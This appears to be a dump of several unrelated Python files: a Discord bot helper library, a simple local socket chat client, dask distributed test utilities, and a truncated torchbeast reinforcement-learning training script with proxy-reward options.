self.app = Flask(import_name, **kwargs)
self._auth = None
self._thread = None
self.app.add_url_rule('/', None, self.ping)
self.app.add_url_rule('/ping', None, self.ping)
self.app.add_url_rule('/vote', None, self.vote, methods=['POST'])
def set_auth(self, auth):
self._auth = auth
def main(self):
return jsonify(Name=self.bot.user.name, Status='Online' if self.bot.is_ready() else 'Offline', Ping=self.bot.latency * 1000 if self.bot.is_ready() else 0)
def ping(self):
return jsonify(Status='Online' if self.bot.is_ready() else 'Offline', Ping=self.bot.latency * 1000 if self.bot.is_ready() else 0)
def vote(self):
req_auth = request.headers.get('Authorization')
if self._auth == req_auth and self._auth is not None:
data = request.json or request.form or request.args or {}
if data.get('type', None) == 'upvote':
event_name = 'vote'
elif data.get('type', None) == 'test':
event_name = 'test_vote'
else:
return Response(status=401)
self.bot.dispatch(event_name, data)
return Response(status=200)
else:
return Response(status=401)
def run(self, host=None, port=None, debug=None, load_dotenv=True, **options):
self._thread = Thread(target=lambda: self.app.run(host, port, debug, load_dotenv=load_dotenv, **options))
self._thread.setDaemon(True)
self._thread.start()
class TopGGPoster(TaskPlus):
def __init__(self, bot: BotPlus, token: str, timer: float = 1800):
super().__init__(bot, seconds=timer)
self.token = token
self.shard_count: Optional[int] = None
self.shard_id: Optional[int] = None
self.headers = {
'User-Agent': __agent__,
'Content-Type': 'application/json',
'Authorization': self.token
}
@TaskPlus.execute
def post(self):
payload = {'server_count': len(self.bot.guilds)}
if self.shard_count is not None:
payload["shard_count"] = self.shard_count
if self.shard_id is not None:
payload["shard_id"] = self.shard_id
return post('https://top.gg/api/bots/stats', data=json.dumps(payload), headers=self.headers)
class CommandErrorHandlerCog(CogPlus):
def get_translation(self, ctx) -> Translation:
return Translation(self.bot, 'Errors')
@CogPlus.listener()
async def on_slash_command_error(self, ctx: SlashContext, exception: Exception):
translation = self.get_translation(ctx)
if isinstance(exception, InteractionError):
await exception.send(self.bot, ctx, translation)
else:
await UnexpectedError(exception).send(self.bot, ctx, translation)
@CogPlus.listener()
async def on_command_error(self, ctx: Context, exception: Exception):
translation = self.get_translation(ctx)
if isinstance(exception, InteractionError):
await exception.send(self.bot, ctx, translation)
else:
await UnexpectedError(exception).send(self.bot, ctx, translation)
class CogLib:
def __init__(self, bot: BotPlus):
self.bot = bot
self._TopGGTask = None
self._CEH = None
def activate_api(self, import_name, host=None, port=None, vote_auth=None):
self.bot.api = API(self.bot, import_name)
self.bot.add_cog(self.bot.api, )
self.bot.api.set_auth(vote_auth)
self.bot.api.run(host=host, port=port)
return self.bot.api
def activate_topgg_poster(self, token: str, timer: float = 1800):
self._TopGGTask = TopGGPoster(self.bot, token, timer)
self._TopGGTask.start()
return self._TopGGTask
def activate_command_error_handler(self, translation_method: Callable[[CogPlus, Union[Context, SlashContext]], Translation] = None):
if self._CEH:
self.bot.remove_cog(self._CEH.qualified_name)
self._CEH = CommandErrorHandlerCog(self.bot)
if translation_method is not None:
self._CEH.get_translation = translation_method
self.bot.add_cog(self._CEH)
def disable_command_error_handler(self):
if self._CEH:
self.bot.remove_cog(self._CEH.qualified_name)
self._CEH = None
def disable_topgg_poster(self):
self._TopGGTask.stop()
|
Client2.py | import socket
import threading
from queue import Queue
NUMBER_OF_THREAD = 2
JOBS = [1, 2]
queue = Queue()
s = socket.socket()
host = '127.0.0.1' #write host server IP
port = 5000
s.connect((host, port))
def send_message():
while True:
try:
#print("Yeah im coming here")
message = input("Client: ")
s.send(str.encode(message, 'utf-8'))
except:
print("error in sending ")
break
def recv_message():
while True:
try:
message = str(s.recv(20480), 'utf-8')
print("\n" + message)
except:
print("error in receiving")
break
def create_workers():
for _ in range(NUMBER_OF_THREAD):
t = threading.Thread(target=work)
t.daemon = True
t.start()
def work():
while True:
x = queue.get()
if x == 1:
send_message()
if x == 2:
recv_message()
queue.task_done()
def create_jobs():
for x in JOBS:
queue.put(x)
queue.join()
create_workers()
create_jobs() |
test_utils_test.py | import asyncio
import os
import pathlib
import signal
import socket
import threading
from contextlib import contextmanager
from time import sleep
import pytest
import yaml
from tornado import gen
import dask.config
from distributed import Client, Nanny, Scheduler, Worker, config, default_client
from distributed.compatibility import WINDOWS
from distributed.core import Server, rpc
from distributed.metrics import time
from distributed.utils import mp_context
from distributed.utils_test import (
_LockedCommPool,
_UnhashableCallable,
assert_worker_story,
check_process_leak,
cluster,
dump_cluster_state,
gen_cluster,
gen_test,
inc,
new_config,
tls_only_security,
)
def test_bare_cluster(loop):
with cluster(nworkers=10) as (s, _):
pass
def test_cluster(loop):
with cluster() as (s, [a, b]):
with rpc(s["address"]) as s:
ident = loop.run_sync(s.identity)
assert ident["type"] == "Scheduler"
assert len(ident["workers"]) == 2
@gen_cluster(client=True)
async def test_gen_cluster(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert await c.submit(lambda: 123) == 123
@gen_cluster(client=True)
async def test_gen_cluster_pytest_fixture(c, s, a, b, tmp_path):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized(c, s, a, b, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", ["a", "b"])
@gen_cluster(client=True)
async def test_gen_cluster_multi_parametrized(c, s, a, b, foo, bar):
assert foo is True
assert bar in ("a", "b")
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized_variadic_workers(c, s, *workers, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in workers:
assert isinstance(w, Worker)
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "1s", "new.config.value": "foo"},
)
async def test_gen_cluster_set_config_nanny(c, s, a, b):
def assert_config():
assert dask.config.get("distributed.comm.timeouts.connect") == "1s"
assert dask.config.get("new.config.value") == "foo"
await c.run(assert_config)
await c.run_on_scheduler(assert_config)
@pytest.mark.skip(reason="This hangs on travis")
def test_gen_cluster_cleans_up_client(loop):
import dask.context
assert not dask.config.get("get", None)
@gen_cluster(client=True)
async def f(c, s, a, b):
assert dask.config.get("get", None)
await c.submit(inc, 1)
f()
assert not dask.config.get("get", None)
@gen_cluster()
async def test_gen_cluster_without_client(s, a, b):
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
async with Client(s.address, asynchronous=True) as c:
future = c.submit(lambda x: x + 1, 1)
result = await future
assert result == 2
@gen_cluster(
client=True,
scheduler="tls://127.0.0.1",
nthreads=[("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)],
security=tls_only_security(),
)
async def test_gen_cluster_tls(e, s, a, b):
assert isinstance(e, Client)
assert isinstance(s, Scheduler)
assert s.address.startswith("tls://")
for w in [a, b]:
assert isinstance(w, Worker)
assert w.address.startswith("tls://")
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
async def test_gen_test():
await asyncio.sleep(0.01)
assert False
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
def test_gen_test_legacy_implicit():
yield asyncio.sleep(0.01)
assert False
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
@gen.coroutine
def test_gen_test_legacy_explicit():
yield asyncio.sleep(0.01)
assert False
@pytest.mark.parametrize("foo", [True])
@gen_test()
async def test_gen_test_parametrized(foo):
assert foo is True
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", [False])
@gen_test()
async def test_gen_test_double_parametrized(foo, bar):
assert foo is True
assert bar is False
@gen_test()
async def test_gen_test_pytest_fixture(tmp_path, c):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
@contextmanager
def _listen(delay=0):
serv = socket.socket()
serv.bind(("127.0.0.1", 0))
e = threading.Event()
def do_listen():
e.set()
sleep(delay)
serv.listen(5)
ret = serv.accept()
if ret is not None:
cli, _ = ret
cli.close()
serv.close()
t = threading.Thread(target=do_listen)
t.daemon = True
t.start()
try:
e.wait()
sleep(0.01)
yield serv
finally:
t.join(5.0)
def test_new_config():
c = config.copy()
with new_config({"xyzzy": 5}):
config["xyzzy"] == 5
assert config == c
assert "xyzzy" not in config
def test_lingering_client():
@gen_cluster()
async def f(s, a, b):
await Client(s.address, asynchronous=True)
f()
with pytest.raises(ValueError):
default_client()
def test_lingering_client_2(loop):
with cluster() as (s, [a, b]):
client = Client(s["address"], loop=loop)
def test_tls_cluster(tls_client):
tls_client.submit(lambda x: x + 1, 10).result() == 11
assert tls_client.security
@pytest.mark.asyncio
async def test_tls_scheduler(security, cleanup):
async with Scheduler(
security=security, host="localhost", dashboard_address=":0"
) as s:
assert s.address.startswith("tls")
def test__UnhashableCallable():
func = _UnhashableCallable()
assert func(1) == 2
with pytest.raises(TypeError, match="unhashable"):
hash(func)
class MyServer(Server):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.handlers["ping"] = self.pong
self.counter = 0
def pong(self, comm):
self.counter += 1
return "pong"
@pytest.mark.asyncio
async def test_locked_comm_drop_in_replacement(loop):
a = await MyServer({})
await a.listen(0)
read_event = asyncio.Event()
read_event.set()
read_queue = asyncio.Queue()
original_pool = a.rpc
a.rpc = _LockedCommPool(original_pool, read_event=read_event, read_queue=read_queue)
b = await MyServer({})
await b.listen(0)
# Event is set, the pool works like an ordinary pool
res = await a.rpc(b.address).ping()
assert await read_queue.get() == (b.address, "pong")
assert res == "pong"
assert b.counter == 1
read_event.clear()
# Can also be used without a lock to intercept network traffic
a.rpc = _LockedCommPool(original_pool, read_queue=read_queue)
a.rpc.remove(b.address)
res = await a.rpc(b.address).ping()
assert await read_queue.get() == (b.address, "pong")
@pytest.mark.asyncio
async def test_locked_comm_intercept_read(loop):
a = await MyServer({})
await a.listen(0)
b = await MyServer({})
await b.listen(0)
read_event = asyncio.Event()
read_queue = asyncio.Queue()
a.rpc = _LockedCommPool(a.rpc, read_event=read_event, read_queue=read_queue)
async def ping_pong():
return await a.rpc(b.address).ping()
fut = asyncio.create_task(ping_pong())
# We didn't block the write but merely the read. The remove should have
# received the message and responded already
while not b.counter:
await asyncio.sleep(0.001)
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(asyncio.shield(fut), 0.01)
assert await read_queue.get() == (b.address, "pong")
read_event.set()
assert await fut == "pong"
@pytest.mark.asyncio
async def test_locked_comm_intercept_write(loop):
a = await MyServer({})
await a.listen(0)
b = await MyServer({})
await b.listen(0)
write_event = asyncio.Event()
write_queue = asyncio.Queue()
a.rpc = _LockedCommPool(a.rpc, write_event=write_event, write_queue=write_queue)
async def ping_pong():
return await a.rpc(b.address).ping()
fut = asyncio.create_task(ping_pong())
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(asyncio.shield(fut), 0.01)
# Write was blocked. The remote hasn't received the message, yet
assert b.counter == 0
assert await write_queue.get() == (b.address, {"op": "ping", "reply": True})
write_event.set()
assert await fut == "pong"
@pytest.mark.slow()
def test_dump_cluster_state_timeout(tmp_path):
sleep_time = 30
async def inner_test(c, s, a, b):
await asyncio.sleep(sleep_time)
# This timeout includes cluster startup and teardown which sometimes can
# take a significant amount of time. For this particular test we would like
# to keep the _test timeout_ small because we intend to trigger it but the
# overall timeout large.
test = gen_cluster(client=True, timeout=5, cluster_dump_directory=tmp_path)(
inner_test
)
try:
with pytest.raises(asyncio.TimeoutError) as exc:
test()
assert "inner_test" in str(exc)
assert "await asyncio.sleep(sleep_time)" in str(exc)
except gen.TimeoutError:
pytest.xfail("Cluster startup or teardown took too long")
_, dirs, files = next(os.walk(tmp_path))
assert not dirs
assert files == [inner_test.__name__ + ".yaml"]
import yaml
with open(tmp_path / files[0], "rb") as fd:
state = yaml.load(fd, Loader=yaml.Loader)
assert "scheduler" in state
assert "workers" in state
def test_assert_worker_story():
now = time()
story = [
("foo", "id1", now - 600),
("bar", "id2", now),
("baz", {1: 2}, "id2", now),
]
# strict=False
assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})])
assert_worker_story(story, [])
assert_worker_story(story, [("foo",)])
assert_worker_story(story, [("foo",), ("bar",)])
assert_worker_story(story, [("baz", lambda d: d[1] == 2)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo", "nomatch")])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz",)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz", {1: 3})])
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("bar",), ("baz", "extra"), ("+1",)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz", lambda d: d[1] == 3)])
with pytest.raises(KeyError): # Faulty lambda
assert_worker_story(story, [("baz", lambda d: d[2] == 1)])
assert_worker_story([], [])
assert_worker_story([("foo", "id1", now)], [("foo",)])
with pytest.raises(AssertionError):
assert_worker_story([], [("foo",)])
# strict=True
assert_worker_story([], [], strict=True)
assert_worker_story([("foo", "id1", now)], [("foo",)])
assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("bar",)], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("baz", {1: 2})], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [], strict=True)
@pytest.mark.parametrize(
"story",
[
[()], # Missing payload, stimulus_id, ts
[("foo",)], # Missing (stimulus_id, ts)
[("foo", "bar")], # Missing ts
[("foo", "bar", "baz")], # ts is not a float
[("foo", "bar", time() + 3600)], # ts is in the future
[("foo", "bar", time() - 7200)], # ts is too old
[("foo", 123, time())], # stimulus_id is not a string
[("foo", "", time())], # stimulus_id is an empty string
[("", time())], # no payload
[("foo", "id", time()), ("foo", "id", time() - 10)], # timestamps out of order
],
)
def test_assert_worker_story_malformed_story(story):
with pytest.raises(AssertionError, match="Malformed story event"):
assert_worker_story(story, [])
@gen_cluster()
async def test_dump_cluster_state(s, a, b, tmpdir):
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"].keys() == {a.address, b.address}
@gen_cluster(nthreads=[])
async def test_dump_cluster_state_no_workers(s, tmpdir):
await dump_cluster_state(s, [], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"] == {}
@gen_cluster(Worker=Nanny)
async def test_dump_cluster_state_nannies(s, a, b, tmpdir):
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert out["workers"].keys() == s.workers.keys()
@gen_cluster()
async def test_dump_cluster_state_unresponsive_local_worker(s, a, b, tmpdir):
a.stop()
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert isinstance(out["workers"][a.address], dict)
assert isinstance(out["workers"][b.address], dict)
@pytest.mark.slow
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "600ms"},
)
async def test_dump_cluster_unresponsive_remote_worker(c, s, a, b, tmpdir):
clog_fut = asyncio.create_task(
c.run(lambda dask_scheduler: dask_scheduler.stop(), workers=[a.worker_address])
)
await asyncio.sleep(0.2)
await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
with open(f"{tmpdir}/dump.yaml") as fh:
out = yaml.safe_load(fh)
assert out.keys() == {"scheduler", "workers", "versions"}
assert isinstance(out["workers"][b.worker_address], dict)
assert out["workers"][a.worker_address].startswith(
"OSError('Timed out trying to connect to"
)
clog_fut.cancel()
def garbage_process(barrier, ignore_sigterm: bool = False, t: float = 3600) -> None:
if ignore_sigterm:
for signum in (signal.SIGTERM, signal.SIGHUP, signal.SIGINT):
signal.signal(signum, signal.SIG_IGN)
barrier.wait()
sleep(t)
def test_check_process_leak():
barrier = mp_context.Barrier(parties=2)
with pytest.raises(AssertionError):
with check_process_leak(check=True, check_timeout=0.01):
p = mp_context.Process(target=garbage_process, args=(barrier,))
p.start()
barrier.wait()
assert not p.is_alive()
def test_check_process_leak_slow_cleanup():
"""check_process_leak waits a bit for processes to terminate themselves"""
barrier = mp_context.Barrier(parties=2)
with check_process_leak(check=True):
p = mp_context.Process(target=garbage_process, args=(barrier, False, 0.2))
p.start()
barrier.wait()
assert not p.is_alive()
@pytest.mark.parametrize(
"ignore_sigterm",
[False, pytest.param(True, marks=pytest.mark.skipif(WINDOWS, reason="no SIGKILL"))],
)
def test_check_process_leak_pre_cleanup(ignore_sigterm):
barrier = mp_context.Barrier(parties=2)
p = mp_context.Process(target=garbage_process, args=(barrier, ignore_sigterm))
p.start()
barrier.wait()
with check_process_leak(term_timeout=0.2):
assert not p.is_alive()
@pytest.mark.parametrize(
"ignore_sigterm",
[False, pytest.param(True, marks=pytest.mark.skipif(WINDOWS, reason="no SIGKILL"))],
)
def test_check_process_leak_post_cleanup(ignore_sigterm):
barrier = mp_context.Barrier(parties=2)
with check_process_leak(check=False, term_timeout=0.2):
p = mp_context.Process(target=garbage_process, args=(barrier, ignore_sigterm))
p.start()
barrier.wait()
assert not p.is_alive()
|
monobeast.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
#import wandb
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
from torchbeast import atari_wrappers
from torchbeast.core import environment
from torchbeast.core import file_writer
from torchbeast.core import prof
from torchbeast.core import vtrace
import numpy as np
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="PongNoFrameskip-v4",
help="Gym environment.")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render", "eval"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
parser.add_argument("--num_episodes", type=int, default=10,
help="Num eval episodes.")
parser.add_argument("--pretrained", default=None, type=str,
help="Whether or not to use a pretrained featurizer.")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=100000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
parser.add_argument("--num_layers", default=1, type=int,
help="Number hidden layers.")
parser.add_argument("--hidden_size", default=512, type=int,
help="Dim of model activations.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.0001, type=float,
help="RMSProp epsilon.")
parser.add_argument("--beta1", default=0.9, type=float,
help="Adam beta1.")
parser.add_argument("--beta2", default=0.999, type=float,
help="Adam beta2.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
# Proxy settings
parser.add_argument("--fuel_multiplier", default=1.0, type=float,
help="How much to increase the score of shooting a fuel cannister to be.")
parser.add_argument("--move_penalty", default=0.0, type=float,
help="How much to penalize moving")
parser.add_argument("--true_move_penalty", default=0.0, type=float,
help="How much to truely penalize moving")
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
def act(
flags,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = prof.Timings() # Keep track of how fast things are.
if flags.pretrained:
gym_env = create_env_seaquest(flags)
else:
gym_env = create_env(flags)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = environment.Environment(gym_env)
env_output = env.initial()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(flags.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
timings.time("model")
env_output = env.step(agent_output["action"])
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
def get_batch(
flags,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(flags.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=flags.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=flags.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def learn(
flags,
actor_model,
model,
batch,
initial_agent_state,
optimizer,
scheduler,
lock=threading.Lock(), # noqa: B008
):
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if flags.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
discounts = (~batch["done"]).float() * flags.discounting
vtrace_returns = vtrace.from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = flags.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
episode_true_returns = batch["episode_true_return"][batch["done"]]
episode_true_move = batch["episode_true_move"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"episode_true_returns": tuple(episode_true_returns.cpu().numpy()),
"episode_true_move": tuple(episode_true_move.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"mean_episode_true_return": torch.mean(episode_true_returns).item(),
"mean_episode_true_move": torch.mean(episode_true_move).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(model.state_dict())
return stats
def create_buffers(flags, obs_shape, num_actions) -> Buffers:
T = flags.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
true_reward=dict(size=(T + 1,), dtype=torch.float32),
true_move=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.bool),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_true_return=dict(size=(T + 1,), dtype=torch.float32),
episode_true_move=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(flags.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
def train(flags): # pylint: disable=too-many-branches, too-many-statements
if flags.xpid is None:
flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
plogger = file_writer.FileWriter(
xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir
)
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
if flags.num_buffers is None: # Set sensible default for num_buffers.
flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
if flags.num_actors >= flags.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if flags.num_buffers < flags.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = flags.unroll_length
B = flags.batch_size
flags.device = None
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
flags.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
flags.device = torch.device("cpu")
if flags.pretrained:
env = create_env_seaquest(flags)
else:
env = create_env(flags)
if flags.pretrained:
model = FNet(env.observation_space.shape, env.action_space.n, num_layers=flags.num_layers, hidden_size=flags.hidden_size, use_lstm=flags.use_lstm)
model.load_my_state_dict(torch.load(flags.pretrained))
else:
model = Net(env.observation_space.shape, env.action_space.n, num_layers=flags.num_layers, hidden_size=flags.hidden_size, use_lstm=flags.use_lstm)
buffers = create_buffers(flags, env.observation_space.shape, model.num_actions)
model.share_memory()
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(flags.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_()
initial_agent_state_buffers.append(state)
actor_processes = []
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(
flags,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
if flags.pretrained:
learner_model = FNet(
env.observation_space.shape, env.action_space.n, num_layers=flags.num_layers, hidden_size=flags.hidden_size, use_lstm=flags.use_lstm
).to(device=flags.device)
learner_model.load_my_state_dict(torch.load(flags.pretrained))
else:
learner_model = Net(
